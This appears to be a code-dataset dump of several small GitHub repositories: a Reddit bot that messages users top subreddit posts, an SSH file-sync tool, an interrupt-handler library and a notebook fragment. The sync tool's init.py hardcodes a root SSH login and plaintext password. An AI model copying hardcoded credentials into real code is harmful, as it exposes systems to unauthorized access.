In[100]:\n\n\nprint(classification_report(test_labels,ytest_predict))\n\n\n# In[101]:\n\n\n# AUC and ROC for the test data\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_test)\n# keep probabilities for the positive outcome only88e\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(test_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(test_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# # END\n" } ]
1
Lyxpudox/Dose_of_Sunshine
https://github.com/Lyxpudox/Dose_of_Sunshine
54a3b910883c55300434e09f183546edd5d4f41c
373020089a86939c4d8ce643a854469ae12843d0
634231992c564d79e4abc62ab67abee213f7fada
refs/heads/master
2020-02-26T23:09:44.941086
2017-08-22T17:22:04
2017-08-22T17:22:04
100,890,474
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.640191912651062, "alphanum_fraction": 0.6415244936943054, "avg_line_length": 36.28571319580078, "blob_id": "e74dca4140cb9279ee0e37a395c77eaf4dfc1e05", "content_id": "4b72f8aaceebb102eceef598875100c350e5089e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3752, "license_type": "permissive", "max_line_length": 133, "num_lines": 98, "path": "/helpers.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "from random import choice, sample\r\n\r\nfrom prawcore.exceptions import NotFound\r\n\r\nfrom models import User\r\n\r\ndef check_subreddits(reddit, subs):\r\n '''\r\n Modified code from /u/gavin19 https://www.reddit.com/r/redditdev/comments/68dhpm/praw_best_way_to_check_if_subreddit_exists_from/\r\n Checks to see if all subreddits within the given list exists.\r\n '''\r\n exists = True\r\n\r\n for sub in subs:\r\n try:\r\n reddit.subreddits.search_by_name(sub, exact = True)\r\n except NotFound:\r\n exists = False\r\n break\r\n\r\n return exists\r\n\r\ndef choose_top_posts(reddit, user, limit):\r\n '''\r\n Chooses three top posts from a user's subscriptions.\r\n Returns a list of posts formatted in Markup with a url and title.\r\n '''\r\n subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n # If there are three or less subreddits, combine the subreddits with a plus\r\n combined_subs = \"+\".join(subs)\r\n images = []\r\n\r\n # If the number of subs is less than or equal to three\r\n if len(subs) <= limit:\r\n # Get the top three hot posts of the combined subreddits and append to images\r\n # Will also exclude sticky posts\r\n post_gen = [submission for submission in reddit.subreddit(combined_subs).hot(limit = limit) if not submission.stickied]\r\n for post in post_gen:\r\n images.append(\"\\n[{}]({})\\n\".format(post.title, post.url))\r\n # Else, choose three subreddits from the user's subscriptions and get a hot post from each\r\n else:\r\n chosen_subs = sample(subs, limit)\r\n for sub in chosen_subs:\r\n post = next(reddit.subreddit(sub).hot(limit = 1))\r\n images.append(\"\\n[{}]({})\\n\".format(post.title, post.url))\r\n\r\n return images\r\n\r\ndef concat_subreddits(user, code):\r\n '''\r\n Taking a user as input, get the first user that appears from the database. Will then get\r\n all subreddits that the user is subscribed to, and will format to show as a list on Reddit.\r\n '''\r\n subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n subs_split = [\" * {}\\n\".format(sub) for sub in subs]\r\n return code + \"\".join(subs_split)\r\n\r\ndef get_unique_subreddits(user, requested):\r\n '''\r\n Gets the user's current subreddits and compares it to a list of subreddits\r\n that they wish to subscribe to. Returns a string of new subreddits.\r\n Extra space at the beginning of string to separate from previous subs.\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n unique_subs = [sub for sub in requested if sub not in current_subs]\r\n return \" \" + \" \".join(unique_subs)\r\n\r\ndef remove_subs(user, requested):\r\n '''\r\n Gets the user's current subreddits and compares it to a list of subreddits\r\n they wish to remove. Returns a string of updated subscriptions.\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n remaining_subs = [sub for sub in current_subs if sub not in requested]\r\n return \" \".join(remaining_subs)\r\n\r\ndef sanitize(requested):\r\n '''\r\n Lowercase and remove \"/r/\" from inputted subreddits\r\n '''\r\n return [sub.lower().replace(\"/r/\", \"\") for sub in requested]\r\n\r\ndef send_reply(message, code):\r\n '''\r\n Mark a message as read and replies to the message with a given string.\r\n '''\r\n message.mark_read()\r\n message.reply(code)\r\n\r\ndef subreddits_present(user, requested):\r\n '''\r\n Checks to see if the requested subs are in the user's current subs\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n\r\n if set(requested) <= set(current_subs):\r\n return True\r\n return False\r\n" }, { "alpha_fraction": 0.7436527609825134, "alphanum_fraction": 0.7534807324409485, "avg_line_length": 52.08695602416992, "blob_id": "1e3c12503fe37c1275e642cbc0f3dc72a98f09f1", "content_id": "e36684101584606a70c03c1fb99c82cdec90c35f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1221, "license_type": "permissive", "max_line_length": 335, "num_lines": 23, "path": "/README.md", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "# Dose_of_Sunshine\nA Reddit bot that messages subscribed users of a chosen number of random top posts within the last 24 hours of their selected subreddits.\n\n## About\nI came up with the idea of this bot while browsing reddit and seeing some cute pictures of a cat on /r/aww, so I decided to make a bot that would send me the top posts from /r/aww every morning, hence the name \"Dose_of_Sunshine\". Despite the name, users can subscribe to any subreddit. This bot is also used for my CS50x Final Project.\n\n## How to use\nTo use Dose_of_Sunshine, send a private message to /u/Dose_of_Sunshine with any title and the following body:\n\n`[add/remove/stop/limit/help] [subreddit 1] [subreddit 2] [subreddit 3] ...`\n\nwhere: \n * add: add new subreddits (if not subscribed, the bot will add the user and their subreddits to the database)\n * remove: remove subreddits\n * stop: stop the bot (removes user from database)\n * limit: change the number of posts to be delivered (1-10, inclusive)\n * help: repeats this message\n * subreddits: names of subreddits separated by a space (no /r/ needed)\n \n Make sure that all subreddits are spelled correctly.\n \n ## Contact\n For any comments or questions, please send a message to /u/Thirteen30.\n" }, { "alpha_fraction": 0.5841266512870789, "alphanum_fraction": 0.5896109342575073, "avg_line_length": 36.197628021240234, "blob_id": "1efef6d34883bfcc9ca1e2fdef06eeb40f6033c6", "content_id": "4c2b434b6524e0ca963277749afa1e69c1e7b6e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9664, "license_type": "permissive", "max_line_length": 625, "num_lines": 253, "path": "/dose_of_sunshine.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "\"\"\"\r\nA Reddit bot that messages subscribed users of a chosen number of random top posts within the\r\nlast 24 hours of their selected subreddits. The name \"Dose_Of_Sunshine\" came from the original\r\nidea to send users pictures from /r/aww every morning.\r\n\r\nCreated by Tony Vo (/u/Thirteen30) 2017\r\n\r\nLicense: MIT License\r\n\"\"\"\r\nimport praw\r\n\r\nimport datetime\r\nimport sys\r\nimport threading\r\nimport time\r\n\r\nfrom models import db, User\r\nfrom helpers import *\r\n\r\n# Constants of messages that can be sent to the user, indicating success or failure\r\nMESSAGE_ALREADY_SUBBED = \"You are already subscribed to all of the given subreddits.\"\r\nMESSAGE_EMPTY_SUBS = \"You must provide at least one subreddit.\"\r\nMESSAGE_HELP = \"To use Dose_Of_Sunshine, send a message with any title and the body containing: \\n\\n`[add/remove/stop/limit/help] [subreddit 1] [subreddit 2] [subreddit 3] ...` \\n\\n where:\\n\\n * add: add new subreddits (if not subscribed, the bot will add you and your subreddits to the database)\\n * remove: remove subreddits\\n * stop: stop the bot (removes you from database)\\n * limit: change the number of posts to be delivered (1 to 10, inclusive)\\n * help: repeats this message\\n * subreddits: name of subreddits separated by a space (no /r/ needed)\\n\\n Please make sure that the subreddit names are correctly spelled.\"\r\nMESSAGE_INVALID = \"Invalid command. \\n\\n \" + MESSAGE_HELP\r\nMESSAGE_LIMIT_INVALID = \"Invalid limit. Limits must be between 1 and 10, inclusive.\"\r\nMESSAGE_NEW_USER = \"You are now subscribed to Dose_Of_Sunshine! The subreddits you are currently subscribed to are: \\n\\n\"\r\nMESSAGE_NOT_SUBSCRIBED = \"You are not subscribed to Dose_Of_Sunshine!\"\r\nMESSAGE_STOP = \"You are now unsubscribed from Dose_Of_Sunshine. We're sad to see you go. :(\"\r\nMESSAGE_SUBS_NOT_PRESENT = \"You are not subscribed to one or more of the given subreddits.\"\r\nMESSAGE_UPDATE_LIMIT = \"You have now updated your limit of posts to \"\r\nMESSAGE_UPDATED = \"You've updated your subscriptions. You are now subscribed to: \\n\\n\"\r\n\r\n# Header and footer of daily posts\r\nHEADER = \"Enjoy your daily dose of sunshine: \\n\"\r\nFOOTER = \"\\n Have a nice day! :) \\n\\n Bot created by /u/Thirteen30 | [Source code](https://github.com/Lyxpudox/Dose_of_Sunshine)\"\r\n\r\n# Send posts at 8:00 AM\r\nLAUNCH_HOUR = 8\r\nLAUNCH_MINUTE = 00\r\n\r\n# Boolean to indicate that all threads should exit (on KeyboardInterrupt)\r\nexit_app = False\r\n\r\ndef authenticate():\r\n \"\"\"\r\n Authenticates bot using praw.ini file and returns Reddit object.\r\n \"\"\"\r\n print(\"Authenticating...\\n\")\r\n reddit = praw.Reddit(\"dose_of_sunshine\", user_agent = \"web:Dose_Of_Sunshine:v0.1 (by /u/Thirteen30)\")\r\n print(\"Authenticated as {}.\\n\".format(reddit.user.me()))\r\n return reddit\r\n\r\ndef messages_handler(reddit):\r\n \"\"\"\r\n Handles users' commands via PM.\r\n \"\"\"\r\n # Get all unread messages\r\n for message in reddit.inbox.unread(limit = None):\r\n\r\n # Author of the message\r\n author = message.author.name\r\n\r\n # See if user is present in database\r\n user = User.select().where(User.username == author).first()\r\n\r\n # Get all subreddits after command\r\n components = message.body.split(\" \")\r\n command = components[0].lower()\r\n\r\n # Possible commands\r\n commands = [\"add\", \"help\", \"stop\", \"remove\", \"limit\"]\r\n\r\n # Commands that require the user to be in the database\r\n registered_required = commands[2:]\r\n\r\n # Commands that require the user not to be in the database\r\n no_args_required = commands[1:3]\r\n\r\n # Make sure command is valid\r\n if command not in commands:\r\n send_reply(message, MESSAGE_INVALID)\r\n continue\r\n elif command in registered_required and user is None:\r\n send_reply(message, MESSAGE_NOT_SUBSCRIBED)\r\n continue\r\n\r\n # Since the limit command requires an integer rather than a list of subs.\r\n # check if the limit command is issued first\r\n if command == \"limit\":\r\n if len(components[1:]) == 1 and components[1].isdigit():\r\n limit = int(components[1])\r\n\r\n if 1 <= limit <= 10:\r\n user.limit = limit\r\n user.save()\r\n\r\n send_reply(message, MESSAGE_UPDATE_LIMIT + \"{}.\".format(limit))\r\n\r\n print(\"Updated {}\\'s limit to {}.\\n\".format(author, limit))\r\n continue\r\n else:\r\n send_reply(message, MESSAGE_LIMIT_INVALID)\r\n continue\r\n\r\n requested_subs = sanitize(components[1:])\r\n\r\n # Ensure all subreddits are valid\r\n if not check_subreddits(reddit, requested_subs):\r\n send_reply(message, MESSAGE_INVALID)\r\n continue\r\n elif command not in no_args_required and len(requested_subs) == 0:\r\n send_reply(message, MESSAGE_EMPTY_SUBS)\r\n continue\r\n\r\n # Add command (add to subscriptions)\r\n # If subscribe command, check if all subreddits are valid\r\n if command == \"add\":\r\n # If user exists, update subscription list\r\n if user is not None:\r\n # Get subreddits that are not already subscribed\r\n new_subs = get_unique_subreddits(author, requested_subs)\r\n\r\n # If none of the subreddits given are new, return an error\r\n if new_subs.isspace():\r\n send_reply(message, MESSAGE_ALREADY_SUBBED)\r\n continue\r\n\r\n print(\"{} exists in the database. Adding {} subs.\\n\".format(author, len(requested_subs)))\r\n\r\n user.subs += new_subs\r\n user.save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_UPDATED))\r\n continue\r\n\r\n # Else, add the user to the database\r\n else:\r\n User.create(username = author, subs = \" \".join(requested_subs), limit = 3).save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_NEW_USER))\r\n print(\"User {} was added to the database.\\n\".format(author))\r\n continue\r\n # Remove command (remove from subscriptions)\r\n elif command == \"remove\":\r\n # Check to see if the requested subreddits are in the user's subscriptions\r\n if subreddits_present(author, requested_subs):\r\n print(\"{} exists in the database. Removing {} subs.\\n\".format(author, len(requested_subs)))\r\n\r\n user.subs = remove_subs(author, requested_subs)\r\n user.save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_UPDATED))\r\n continue\r\n else:\r\n send_reply(message, MESSAGE_SUBS_NOT_PRESENT)\r\n continue\r\n # If user requests to stop, delete from database\r\n elif command == \"stop\":\r\n user.delete_instance()\r\n\r\n send_reply(message, MESSAGE_STOP)\r\n print(\"Deleted {} from the database.\\n\".format(author))\r\n continue\r\n elif command == \"help\":\r\n send_reply(message, MESSAGE_HELP)\r\n continue\r\n\r\ndef check_messages(reddit):\r\n \"\"\"\r\n Check for messages every five minutes and responds accordingly.\r\n \"\"\"\r\n while not exit_app:\r\n number_of_messages = len(list(reddit.inbox.unread(limit = None)))\r\n\r\n if number_of_messages > 0:\r\n print(\"{} message(s) found.\\n\".format(number_of_messages))\r\n\r\n db.connect()\r\n\r\n messages_handler(reddit)\r\n\r\n db.close()\r\n else:\r\n print(\"No messages detected.\\n\")\r\n\r\n time.sleep(300)\r\n\r\ndef send_posts(reddit):\r\n \"\"\"\r\n Chooses the top posts from a user's subscriptions and sends them to the user\r\n via PM.\r\n \"\"\"\r\n while not exit_app:\r\n # Gets current time\r\n now = datetime.datetime.now()\r\n hour, minute = now.hour, now.minute\r\n\r\n if hour == LAUNCH_HOUR and minute == LAUNCH_MINUTE:\r\n print(\"It is now {}:{:02}\".format(LAUNCH_HOUR, LAUNCH_MINUTE))\r\n\r\n db.connect()\r\n\r\n for user in User.select():\r\n limit = user.limit\r\n\r\n images = choose_top_posts(reddit, user.username, limit)\r\n\r\n reddit.redditor(user.username).message(\"Your Daily Dose of Sunshine\", HEADER + \"\".join(images) + FOOTER)\r\n\r\n print(\"Sent daily posts to {}.\".format(user.username))\r\n\r\n db.close()\r\n\r\n time.sleep(30)\r\n\r\ndef main():\r\n \"\"\"\r\n Main function. Creates two threads (one for messages and one for\r\n sending posts) to run loops concurrently.\r\n \"\"\"\r\n reddit = authenticate()\r\n\r\n messages_thread = threading.Thread(name=\"messages\",\r\n target=check_messages,\r\n args=[reddit],\r\n daemon=True)\r\n\r\n posts_thread = threading.Thread(name=\"posts\",\r\n target=send_posts,\r\n args=[reddit],\r\n daemon=True)\r\n\r\n messages_thread.start()\r\n posts_thread.start()\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n When KeyboardInterrupt has been called, set exit_app to false to kill\r\n all threads and exit the program.\r\n \"\"\"\r\n try:\r\n main()\r\n\r\n # Keeps program running by inducing a permanent loop until interrupt\r\n while True:\r\n time.sleep(0.1)\r\n\r\n except KeyboardInterrupt:\r\n print(\"Finished all tasks. Closing down...\")\r\n\r\n exit_app = True\r\n\r\n sys.exit()\r\n" }, { "alpha_fraction": 0.6361746191978455, "alphanum_fraction": 0.6424116492271423, "avg_line_length": 26.294116973876953, "blob_id": "637641fc5b8e951fb6ea9481cfb773f40f429589", "content_id": "211038ac07572829cfb95632cbb27839a877368a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "permissive", "max_line_length": 91, "num_lines": 17, "path": "/models.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "from peewee import *\r\n\r\ndb = SqliteDatabase(\"users.db\")\r\n\r\nclass User(Model):\r\n '''\r\n Model for each user that subscribes to the bot.\r\n username = username of the user who is subscribed to the bot\r\n subs = the subreddits they are subscribed to\r\n limit = integer from 1 to 10 (inclusive) that tells of how many posts will be delivered\r\n '''\r\n username = CharField()\r\n subs = CharField()\r\n limit = IntegerField()\r\n\r\n class Meta:\r\n database = db\r\n" } ]
4
LegGnom/PySync
https://github.com/LegGnom/PySync
0e1b96dd5aabfe4ee2681ec83e0141d04b6479c9
a6065f5416bd50a973f9b38eef646a5a69a45ed5
1b83fb7485964b0128fdbc9b10f84a03a4e9bbb4
refs/heads/master
2016-09-08T11:55:01.677437
2015-01-17T17:52:49
2015-01-17T17:52:51
29,398,023
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40942028164863586, "alphanum_fraction": 0.4492753744125366, "avg_line_length": 18.35714340209961, "blob_id": "348ccec60f59e340676130150d6d623f356a4f2b", "content_id": "eddfeeddc2cc8705f931a070f102ea545249a6fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/init.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import watcher\n\nwatcher.init({\n 'ssh': {\n 'host': '192.168.56.101',\n 'user': 'root',\n 'pass': 'zubr12229'\n },\n 'remotepath': '/var/www/',\n 'localpath': '/Users/leggnom/Desktop/-=Projects=-/',\n 'ignore': [\n # '/.idea/'\n ]\n})\n\n\n\n\n\n" }, { "alpha_fraction": 0.5716878175735474, "alphanum_fraction": 0.5747126340866089, "avg_line_length": 24.8125, "blob_id": "0771d7e534e49019ac7dbdadb8643c6ed7ee72fa", "content_id": "6f5023df6b6763889ef9c723ee343e2584c877fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1653, "license_type": "no_license", "max_line_length": 106, "num_lines": 64, "path": "/watcher.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nimport os.path\nfrom ssh import SSH\n\nclass Watcher(PatternMatchingEventHandler):\n\n options = {}\n\n def __init__(self, options):\n PatternMatchingEventHandler.__init__(self)\n self.options = options\n\n ssh = options['ssh']\n port = 22\n if 'port' in ssh:\n port = ssh['port']\n\n self.ssh = SSH(\n host=ssh['host'],\n user=ssh['user'],\n password=ssh['pass'],\n port=port\n )\n\n if self.options['remotepath'][-1] != '/':\n self.options['remotepath'] += '/'\n\n def process(self, event):\n if not os.path.isfile(event.src_path) and os.path.exists(event.src_path):\n return\n\n if 'ignore' in self.options:\n for item in self.options['ignore']:\n if item in event.src_path:\n return\n\n path = event.src_path.strip('/').split('/')[len(self.options['localpath'].strip('/').split('/')):]\n path = '/'.join(path)\n remotepath = self.options['remotepath'] + path\n self.ssh.upload(remotepath, event.src_path)\n\n\n def on_modified(self, event):\n self.process(event)\n\n def on_created(self, event):\n self.process(event)\n\n\ndef init(options):\n args = [options['localpath']]\n observer = Observer()\n observer.schedule(Watcher(options=options), path=args[0], recursive=True)\n observer.start()\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n\n observer.join(options)\n\n" }, { "alpha_fraction": 0.5854922533035278, "alphanum_fraction": 0.5928941369056702, "avg_line_length": 26.020000457763672, "blob_id": "b77f62173bdcc2068f5406727a807ad10d4461b1", "content_id": "df78fa468051271dc53801cf1224e5f7df23698f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1351, "license_type": "no_license", "max_line_length": 70, "num_lines": 50, "path": "/ssh.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import paramiko\nimport os\n\nhost = '192.168.0.8'\nuser = 'login'\nsecret = 'password'\nport = 22\n\n\nclass SSH ():\n\n sftp = ''\n transport = ''\n\n def __init__(self, host, user, password, port):\n self.transport = paramiko.Transport((host, port))\n self.transport.connect(username=user, password=password)\n self.sftp = paramiko.SFTPClient.from_transport(self.transport)\n\n def upload(self, remotepath, localpath):\n try:\n self.sftp.put(localpath, remotepath)\n except IOError:\n remote_dirname, basename = os.path.split(remotepath)\n self.mkdir(remote_dirname)\n self.sftp.put(localpath, remotepath)\n\n def download(self, remotepath, localpath):\n self.sftp.get(remotepath, localpath)\n\n def mkdir(self, remote_directory):\n if remote_directory == '/':\n self.sftp.chdir('/')\n return\n if remote_directory == '':\n return\n remote_dirname, basename = os.path.split(remote_directory)\n self.mkdir(os.path.dirname(remote_directory))\n try:\n self.sftp.chdir(basename)\n except IOError:\n self.sftp.mkdir(basename)\n self.sftp.chdir(basename)\n\n def close(self):\n self.sftp.close()\n self.transport.close()\n\n def __exit__(self):\n self.close()\n" }, { "alpha_fraction": 0.46254071593284607, "alphanum_fraction": 0.49837133288383484, "avg_line_length": 16.05555534362793, "blob_id": "e7d791b6b1298a94212da227d215f1a4d4816204", "content_id": "3c3e83a9c43020ddead25cbd33fb9a763abce5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 350, "license_type": "no_license", "max_line_length": 51, "num_lines": 18, "path": "/README.md", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "# PySync\n\nУтилита для одностороней синхронизаии файлов по ssh\n\nВ init.py \n\nwatcher.init({\n 'ssh': {\n 'host': '192.168.56.101',\n 'user': 'user',\n 'pass': 'pass'\n },\n 'remotepath': '/var/www/',\n 'localpath': '/path/to/watch/',\n 'ignore': [\n '/.idea/'\n ]\n})\n" } ]
4
onetop21/interrupt_handler
https://github.com/onetop21/interrupt_handler
c021cbb6dc1d41202a0abcbc97e5e4c1021b5b0e
f6e4c4fd663693e02c4a6604e335e91ef9a6ffe8
72c0d0386ae8a0c1a42889611131f95e40b72e26
refs/heads/main
2023-09-03T08:39:48.682106
2021-10-24T13:14:54
2021-10-24T13:14:54
374,836,335
1
0
MIT
2021-06-08T00:37:28
2021-06-10T07:44:54
2021-06-10T09:18:28
Python
[ { "alpha_fraction": 0.6745561957359314, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 23.285715103149414, "blob_id": "7fc53508098826a4d948fce3cf25eb82e1535dd0", "content_id": "2f59c4ae6519f888de364e081e4f7aaeb0220bb2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "permissive", "max_line_length": 56, "num_lines": 7, "path": "/interrupt_handler/default_callback.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\n\ndef default_callback(message='Aborted.', blocked=False):\n def wrapper():\n print(message, file=sys.stderr)\n return blocked\n return wrapper" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5841270089149475, "avg_line_length": 36.05882263183594, "blob_id": "4fac8409922e764054f6662b7dd0ab6d3c20860c", "content_id": "6be7dbdf3e38953294c8a68cdc629594db384006", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 630, "license_type": "permissive", "max_line_length": 86, "num_lines": 17, "path": "/.test/test.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import time\nfrom interrupt_handler import InterruptHandler, default_callback\n\nif __name__ == '__main__':\n import time\n main_loop = True\n sub_loop = True\n with InterruptHandler(default_callback('Locked', True), propagate=True) as h1:\n while not h1.interrupted:\n print(f'MainLoop {time.time()}, {h1}, {h1.interrupted}')\n with InterruptHandler(default_callback('Message2'), propagate=True) as h2:\n while sub_loop:\n print(f'SubLoop {time.time()}')\n time.sleep(1)\n sub_loop = False\n time.sleep(1)\n main_loop = False\n" }, { "alpha_fraction": 0.6338438987731934, "alphanum_fraction": 0.6396790742874146, "avg_line_length": 20.761905670166016, "blob_id": "6d86313d5a1a6a13cd428c165b9f643a6ff707ae", "content_id": "9710ee9b7f95454d4344f9d29435302cdf636d14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 70, "num_lines": 63, "path": "/README.md", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "# Interrupt Handler\nInterrupt Handling Util for Python.\n\n## Installation\n```bash\n$ pip install InterruptHandler\n```\n\n## How to Use\n```python\nfrom interrupt_handler import InterruptHandler\n\n# Break by Keyboard Interrupt (Default)\nwith InterruptHandler() as h:\n ...\n \n# Break by checking interrupted flag.\nwith InterruptHandler(lambda: True) as h:\n if h.interrupted:\n break\n ...\n \n \n# Propagate signal to parent.\nwith InterruptHandler():\n with InterruptHandler(propagate=True):\n ...\n```\n \n### Callback customize\n#### return False\n> Escape 'with statement' forcley.\n#### return True\n> Switch 'interrupted flag'.\n``` python\ndef callback():\n print('Interrupted by User.')\n return False\n \nwith InterruptHandler(callback) as h:\n ...\n```\n\n## Example\n```python\nimport time\nfrom interrupt_handler import InterruptHandler, default_callback\n\nif __name__ == '__main__':\n import time\n main_loop = True\n sub_loop = True\n with InterruptHandler(default_callback('Locked', True)) as h1:\n while not h1.interrupted:\n print(f'MainLoop {time.time()}, {h1}, {h1.interrupted}')\n with InterruptHandler(default_callback('Message2')) as h2:\n while sub_loop:\n print(f'SubLoop {time.time()}')\n time.sleep(1)\n sub_loop = False\n time.sleep(1)\n main_loop = False\n```\n" }, { "alpha_fraction": 0.6127167344093323, "alphanum_fraction": 0.6173410415649414, "avg_line_length": 26.935483932495117, "blob_id": "31ad11f7496c10f4227aa71f35e6d51a726e974d", "content_id": "0146becf37c4cb0f6b955248952db4e810c4809e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "permissive", "max_line_length": 62, "num_lines": 31, "path": "/setup.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\nimport os\nfrom setuptools import setup, find_packages\nfrom interrupt_handler import __version__\n\ndef main():\n # Read Description form file\n try:\n with open('README.rst') as f:\n description = f.read()\n except:\n print('Cannot find README.md file.', file=sys.stderr)\n description = \"Interrupt Handling Utility for Python.\"\n\n setup(\n name='InterruptHandler',\n version=__version__,\n description='Interrupt Handling Library for Python.',\n long_description=description,\n author='Hyoil LEE',\n author_email='[email protected]',\n license='MIT License',\n packages=find_packages(exclude=['.temp', '.test']),\n url='https://github.com/onetop21/interrupt_handler.git',\n zip_safe=False,\n python_requires='>=3.0',\n install_requires=[],\n )\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6129032373428345, "alphanum_fraction": 0.6221198439598083, "avg_line_length": 13.466666221618652, "blob_id": "5c35f07c968b50c52c3caf2ba872ad88d911ff99", "content_id": "842f31d5789859e28e80f614b044274f7bb9bd8a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 217, "license_type": "permissive", "max_line_length": 53, "num_lines": 15, "path": "/README.rst", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "Interrupt Handler\n=================\n\nInterrupt Handling Util for Python.\n\nInstallation\n==============\n\n$ pip install InterruptHandler\n\n\nHow To Use\n==============\n\nVisit : https://github.com/onetop21/interrupt_handler\n" }, { "alpha_fraction": 0.5973197221755981, "alphanum_fraction": 0.5973197221755981, "avg_line_length": 30.979591369628906, "blob_id": "d98f2e058e8ba52a6ea5cee4c6d26bc16a5150bc", "content_id": "9c41d358aea7132df915750ec629ae7bd4ea37f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "permissive", "max_line_length": 88, "num_lines": 49, "path": "/interrupt_handler/interrupt_handler.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport signal\nfrom .default_callback import default_callback\n\nclass InterruptHandler(object):\n def __init__(self, callback=default_callback(), sig=signal.SIGINT, propagate=False):\n if not callable(callback):\n raise ValueError(f'callback parameter is not support {type(callback)}.')\n self.callback = callback\n self.sig = sig\n self.propagate = propagate\n self.original_handler = None\n\n @property\n def interrupted(self):\n return getattr(self, '_interrupted', False)\n\n def __enter__(self):\n self.initialize()\n return self\n\n def __exit__(self, type, value, tb):\n return self.release()\n\n def initialize(self):\n if not self.original_handler:\n self._interrupted = False\n self.released = False\n self.original_handler = signal.getsignal(self.sig)\n def handler(signum, frame):\n if not self.callback():\n self.release(True)\n self._interrupted = True\n signal.signal(self.sig, handler)\n else:\n raise RuntimeError('Already initialized.')\n\n def release(self, interrupted=False):\n if self.released:\n if self.propagate:\n os.kill(os.getpid(), self.sig)\n return True\n if self.original_handler:\n signal.signal(self.sig, self.original_handler)\n self.original_handler = None\n self.released = True\n if interrupted: raise KeyboardInterrupt\n return False\n" }, { "alpha_fraction": 0.7542372941970825, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 28.5, "blob_id": "13093d40ac26e8f73a6fab460f86051b25f1802e", "content_id": "e57505bf7eebdfee7efb5692715b1e42cd40dc90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "permissive", "max_line_length": 47, "num_lines": 4, "path": "/interrupt_handler/__init__.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "from .interrupt_handler import InterruptHandler\nfrom .default_callback import default_callback\n\n__version__ = '0.0.4'\n" } ]
7
cornelltech/visaware
https://github.com/cornelltech/visaware
f7f111f62cb41a32c861cf1dc78575c036d35cb9
ea50d1d288c8af845176bcf761db15e6b18230a6
899289e4e448b0ced0df9d38c35fb00f951058e3
refs/heads/master
2021-03-22T00:13:59.265418
2018-12-10T16:04:39
2018-12-10T16:04:39
114,006,261
1
0
null
null
null
null
null
